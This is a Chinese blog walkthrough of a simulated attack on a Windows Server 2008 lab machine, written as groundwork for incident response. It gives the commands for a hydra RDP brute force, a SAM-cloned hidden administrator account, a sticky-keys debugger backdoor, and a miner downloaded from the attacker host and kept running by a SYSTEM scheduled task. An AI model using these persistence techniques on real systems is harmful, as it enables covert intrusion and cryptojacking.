渗透测试笔记——暴力破解、定时任务与shift粘贴键权限维持、wakuang程序(靶机系统:Windows2008)

已于 2023-04-20 10:55:19 修改
阅读量1.1k 收藏 16
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 应急响应 文章标签: 网络安全 渗透测试实战
于 2022-11-17 13:26:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40412037/article/details/123569414
本文介绍了如何模拟针对Windows Server 2008系统的黑客攻击过程,包括端口扫描、密码爆破、创建隐藏账户、设置粘贴键后门及植入恶意程序等步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆

一、环境搭建

靶机: Windwos Server 2008 系统
靶机IP地址: 192.168.226.137

攻击IP地址: 192.168.226.1

二、模拟攻击

2.1 扫描端口

拿到目标IP首先使用nmap扫描,探测一下开放的端口

nmap -sS 192.168.226.137

发现目标系统的 3389 号端口开发
在这里插入图片描述

2.2 暴力破解 Administrator 密码

使用 hydra 工具爆破 Administrator 登录密码

hydra.exe -l Administrator  -P pass.txt rdp://192.168.226.137

在这里插入图片描述
使用爆破出的密码成功登录目标系统

2.3 权限维持—Windows系统隐藏账户

添加wxiaoge$隐藏账户并且添加进管理员组,首先执行以下命令

net user wxiaoge$ w123456! /add                  #添加wxiaoge$隐藏用户
net localgroup administrators wxiaoge$ /add    #将wxiaoge$用户添加进管理员组中

在这里插入图片描述
然后打开注册表编辑器,找到HKEY_LOCAL_MACHINE\SAM\SAM,点击右键,选择“权限”,将Administrator用户的权限,设置成“完全控制”,然后重新打开注册表,确保可以看到SAM路径下的文件。

找到HKEY_LOCAL_MACHINE\SAM\SAM,点击右键,选择“权限”
在这里插入图片描述
将Administrator用户的权限,设置成“完全控制”

在这里插入图片描述
重新打开注册表,确保可以看到SAM路径下的文件
在这里插入图片描述
之后,前往SAM/Domains/Account/Users/Names处,选择Administrator用户,在右侧的键值处可以找到对应的值如0x1f4,然后从左侧的Users目录下可以找到对应的文件。
在这里插入图片描述
然后从对应的000001F4文件中将键值对F的值复制出来。然后同理找到隐藏账户wxiaoge$所对应的文件,并将从Administrator文件中复制出来的F值粘贴进 wxiaoge $文件中。
在这里插入图片描述
在这里插入图片描述

最后将wxiaoge $ 和000003EB从注册表中右键导出,并删除wxiaoge$用户,然后将刚刚导出的两个文件重新导入进注册表中即可实现wxiaoge用户的隐藏。

导出:
在这里插入图片描述
在这里插入图片描述
删除 wxiaoge$ 账户,成功删除后,注册表中的000003EB、wxiaoge$都没有了
在这里插入图片描述
点击刚刚导出保存的 wxiaoge.reg和3EB.reg,点击之后会自动导入注册表
在这里插入图片描述
wxiaoge.reg和3EB.reg成功导入后,可以继续使用wxiag账户登录,之后验证后门账户,且成功登录

2.4 权限维持—shift粘贴键后门

1、粘滞键的启动程序在C盘的Windows/system32目录下为sethc.exe。所以我们打开注册表,定位到以下路径:
HKEY_LOCAL_MACHINE\ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File ExecutionOption
在这里插入图片描述

2、在目录中新建一个sethc.exe的子项,并添加一个新键debugger,debugger的对应键值为cms的路径。
cmd路径:C:\Windows\system32\cmd.exe
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2.5 植入恶意程序

将恶意wa kung程序放在本机的WWW目录下
在这里插入图片描述
让靶机通过浏览器下载到本地,浏览器地址 http://192.168.226.1/wkbd.zip
在这里插入图片描述
之后在靶机(windows server 2008)上解压wkbd.zip文件并且执行 javs.exe恶意程序
在这里插入图片描述
执行之后查看 出现如下弹窗,说明wa kuang恶意程序已经成功运行
在这里插入图片描述
为了防止管理员将恶意挖矿程序 javs.exe给关闭,设置计划任务,每隔一分钟执行一次 javs.exe 恶意程序

schtasks /create /tn system /sc minute /mo 1 /tr C:\Users\Administrator\Downloads\wkbd\wkbd\javs.exe  /ru system /f
#创建一个system计划任务,每一分钟执行一次javs.exe

在这里插入图片描述
至此,模拟实战结束,成功留了后门、恶意程序

在这里插入图片描述

Windows-server-2008 搭建渗透测试靶机
zhq199528的博客
10-03 3162
** Windows-server-2008 搭建靶机 ** 首先,为了方便后面的操作,我们要在开机前进行文件共享,使我们要用的文件夹共享到虚拟机上 开启虚拟机(因为我这是之前就已经的做好的一个,然后进行了一下克隆,所以很多步骤在这里就不显示了,如要了解可去我的文章库里进行寻找) 对xampp应用程序进行一些配置更改,让xampp使用管理员身份运行 安装gVim,后面的配置文件都要用vim进行编辑 打开xampp,更改配置 (使用gVim打开xampp的配置文件,并进行编辑) (开启Apa
知攻善防Web1应急靶机笔记--详解
LINGX5的博客
08-08 2237
这是一台知攻善防实验室的应急响应靶机,方便大家练习一下应急响应的流程和操作。靶机的前景概述:前景需要:小李在值守的过程中,发现有CPU占用飙升,出于胆子小,就立刻将服务器关机,这是他的服务器系统,请你找出以下内容,并作为通关条件:1.攻击者的shell密码2.攻击者的IP地址3.攻击者的隐藏账户名称4.攻击者挖矿程序的矿池域名用户:密码靶机地址提取码:1gs21、我们先是用D盾对phpstudy的主目录进行了扫描,发现了一个webshell脚本shell.php。
渗透测试模拟实战——暴力破解、留定时任务后门shift粘贴键后门、植入WaKuang程序(对应靶场和wakuang样本)
03-24
渗透测试模拟实战——暴力破解、留定时任务后门shift粘贴键后门、植入WaKuang程序靶机系统Windows2008)对应的靶场和wakuang样本,参考教程链接:https://blog.csdn.net/weixin_40412037/article/details/123685991?spm=1001.2014.3001.5501
渗透测试模拟实战——暴力破解、留后门隐藏账户shift粘贴键后门、植入WaKuang程序靶机系统Windows2008
W小哥
03-23 8476
本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆 一、环境搭建 靶机: Windwos Server 2008 系统 靶机IP地址: 192.168.226.137 攻击IP地址: 192.168.226.1 二、模拟攻击 2.1 扫描端口 拿到目标IP首先使用nmap扫描,探测一下开放的端口 nmap -sS 192.168.226.137 发现目标系统的 3389 号端口开发 2.2 暴力破解 Administrator 密码 使用 hydra 工具爆破 Adminis
渗透测试笔记——暴力破解、ssh公钥权限维持、GPU Wakuang程序靶机系统:ubuntu)
W小哥
02-17 2117
本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆
【内网渗透】ipc后设置定时任务at&schtasks
小白鸽
08-07 1577
定时任务at
一次真实的应急响应案例(Windows2008)暴力破解、留隐藏账户shift粘贴键后门、植入WK程序-应急响应靶场
04-06
一次真实的应急响应案例(Windows2008)暴力破解、留隐藏账户、shift粘贴键后门、植入wakuang程序——对应的应急响应靶场,应急响应教程参考链接:...
Windows应急响应——知攻善防应急靶场
最新发布
qq_42494313的博客
02-02 894
小李在值守的过程中,发现有占用飙升,出于胆子小,就立刻将服务器关机,这是他的服务器系统,请你找出以下内容,并作为通关条件:攻击者的shell密码2.攻击者的IP地址3.攻击者的隐藏账户名称4.攻击者挖矿程序的矿池域名用户:密码关于靶机启动解压后直接用Vmware打开即可。
一次真实的应急响应案例(Windows2008)——暴力破解、留隐藏账户后门shift粘贴键后门、植入WaKuang程序——事件复现(含靶场环境)
热门推荐
W小哥
04-02 1万+
一、事件背景 某天客户反馈:服务器疑似被入侵,恶意IP进行通信(恶意IP用192.168.226.131代替)。(真实案例自己搭建环境复现一下,靶场环境放在了 知识星球 和 我的资源 中) 受害服务器: Centos系统、IP: 192.168.226.132、无WEB服务 二、应急响应过程 2.1 排查网络连接 2.2 排查历史命令 2.3 排查后门账户 2.4 排查crontab后门 2.5 排查是否有命令被替换 三、应急响应溯源 3.1 查看后门 3.2 排查安全日志 3.2 溯源总结 至此,应急响
权限维持Windows&自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon
今天是几号的博客
04-15 1238
配合powershell payload(需免杀)实现无文件落地。系统自带的辅助功能进行替换执行,放大镜,旁白,屏幕键盘等均可。1、WinLogon配合无文件落地上线(切换用户登录就会上线)远程连接时,连按五下shift键可以打开粘滞键。将后门放置该目录,服务器重启即上线。测试:执行notepad成cmd。-服务器键值(需要管理员权限)2、屏幕保护生效后执行后门。3、自启动注册表加载。
MSF渗透Win server 2008 R2
妖魔鬼怪快离开的博客
11-15 8039
详细步骤信息收集漏洞探测漏洞利用权限提升权限维持远程桌面痕迹清除 信息收集 使用nmap工具进行扫描,发现发现开放了445端口,尝试利用MS17_010漏洞。 nmap –sV 目标主机IP地址 漏洞探测 2. 1查看漏洞模块 search ms17-010 2. 2使用Auxiliary模块测试目标 选择Auxiliary模块 use auxiliary/scanner/smb/smb_ms17_010 设置目标主机IP并测试 set RHOST 目标主机IP地址 run 漏洞利用 使用ex
kali-Linux局域网渗透之Win2008
LJHandCXY的博客
03-28 5230
相关参数 kali的IP地址为:192.168.0.103/24 win2003的IP地址为:192.168.0.138/24 ()蓝屏攻击(针对2008)   前提:对方开启3389端口且只对某些操作系统有效   原理:利用操作系统内核的缺陷,发送大量数据包,则这个漏洞可能造成拒绝服务攻击或允许远程执行代码 可使用Kali自带的nmap来进行扫描 渗透前提 nmap -sV [IP地址] 或 nmap -sS -sV [IP地址]都可 #大家怎么方便怎么来 情
权限维持-Windows影子用户
weixin_52829570的博客
11-07 1689
windows中创建一个影子用户,影子用户拥有和正常用户一样的权限和功能影子用户只可在注册表中看到演示环境:windows server 2012(靶机)前提:需要一个高权限用户(administrator 或者是 system)
爆破3389密码:目标主机Win2008(私有IP为192.168.1.167)开放3389端口,使用kali中的Hydra爆破密码。
彭淦淦的博客
04-25 4682
4.2 步骤 实现此案例需要按照如下步骤进行。 首先构造密码字典pass.txt,然后使用Hydra爆破密码。 1)运行命令 hydra -l administrator -P pass.txt 192.168.1.167 rdp 2)运行后的效果如图-9所示,破解的密码为Abc12345 图-9 ...
针对windows server 2008R2 复现永恒之蓝漏洞(命令行操作)
m0_50505929的博客
03-31 3187
kali渗透windows server 2008 R2 永恒之蓝 linux:kali Linux windowswindows server 2008 R2 确认进入kali的root 进入kali的msf:msfconsole 使用可用端口模块:use auxiliary/scanner/smb/smb_version 查看需要设置的参数:show options yes为需要设置的参数,no无需设置 设置目标主机地址:set rhosts 192.168.205.150 设置线程数:set
基于 Win Server 2008 复现 IPC$ 漏洞
Welcome To Myon'Blog !
03-07 2136
所有的这些初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者会利用 IPC$ ,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测。为了配合IPC共享工作,Windows操作系统(不包括Windows 98系列)在安装完成后,自动设置共享的目录为:C盘、D盘、E盘、ADMIN目录(C:\Windows)等,即为 ADMIN$、C$、D$、E$ 等,但要注意,这些共享是隐藏的,只有管理员能够对他们进行远程操作。(相当于是限定我们的渗透方向)。
nessus 命令行新建用户_window常用命令及添加隐藏账户
weixin_33379878的博客
02-19 947
好好生活,好好去爱,怀念不一定要相见,喜欢不一定就要在一起,你要相信,每一次相遇都有他的意义。。。---- 网易云热评一、常用命令1、查看系统版本:ver2、查看主机名:hostname3、查看网络配置:ipconfig/all4、查看用户:net user5、查看开放端口:netstat -ano6、打开注册表:regedit7、打开时间查看器:eventvwr.msc8、打开系统服务:ser...
Windows系统如何清除登录密码
weixin_49423593的博客
04-19 5574
2.按路径找到下面Value data 数值改成0:\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PasswordLess\Device。3.win+R 打开cmd,输入netplwiz,打开User Accounts界面,会看到划红线的地方,不勾选点下面OK,弹出的方框里输入两次登录密码,选择OK,即可取消登陆密码。1.win+R 打开cmd,输入regedit。
bin目录被篡改怎么办
12-27
可以通过比较当前系统的 `/bin` 文件夹已知良好状态下的文件列表来进行对比。 对于 Linux 发行版而言,通常可以利用包管理器来验证安装文件的一致性。例如,在基于 Debian 的系统上可执行如下命令: ```bash ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W小哥1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值